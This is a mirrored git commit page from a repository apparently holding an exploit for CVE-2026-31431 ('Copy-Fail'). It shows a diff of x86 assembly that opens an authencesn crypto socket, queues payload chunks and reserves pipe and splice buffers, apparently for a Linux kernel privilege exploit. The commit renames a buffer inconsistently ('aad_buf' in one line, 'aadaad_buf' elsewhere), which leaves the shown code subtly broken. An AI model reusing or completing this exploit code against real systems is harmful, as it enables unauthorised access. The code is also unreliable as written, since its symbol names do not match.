mirror of
https://github.com/4xura/CVE-2026-31431-Copy-Fail.git
synced 2026-05-26 05:10:50 +00:00
init
This commit is contained in:
parent
31ac27ea2c
commit
baa990a599
3 changed files with 202 additions and 25 deletions
|
|
@ -153,11 +153,11 @@ open_authencesn_socket:
|
|||
|
||||
; rsi = pointer to the next 4-byte payload chunk.
|
||||
queue_aad:
|
||||
mov dword [aad], 0x41414141
|
||||
mov dword [aad_buf], 0x41414141
|
||||
mov eax, [rsi]
|
||||
mov [aad + 4], eax
|
||||
mov [aadaad_buf + 4], eax
|
||||
|
||||
lea rax, [rel aad]
|
||||
lea rax, [rel aadaad_buf]
|
||||
mov [iov], rax
|
||||
mov qword [iov + 8], 8
|
||||
|
||||
|
|
@ -336,7 +336,7 @@ saved_op_fd resq 1
|
|||
pipefd resd 2
|
||||
splice_off resq 1
|
||||
splice_len resq 1
|
||||
aad resb 8
|
||||
aadaad_buf resb 8
|
||||
iov resq 2
|
||||
msg_hdr resb 56
|
||||
cbuf resb 88
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue